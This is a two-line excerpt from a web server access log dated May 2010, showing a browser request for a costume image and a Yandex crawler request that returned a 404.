81.94.22.44 - - [08/May/2010:11:10:18 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 200 15105 "http://tomdolan.pconline.com/costume/thmb7.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.51"
87.250.255.243 - - [08/May/2010:11:11:48 -0500] "GET /logs/access_log.1251676800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
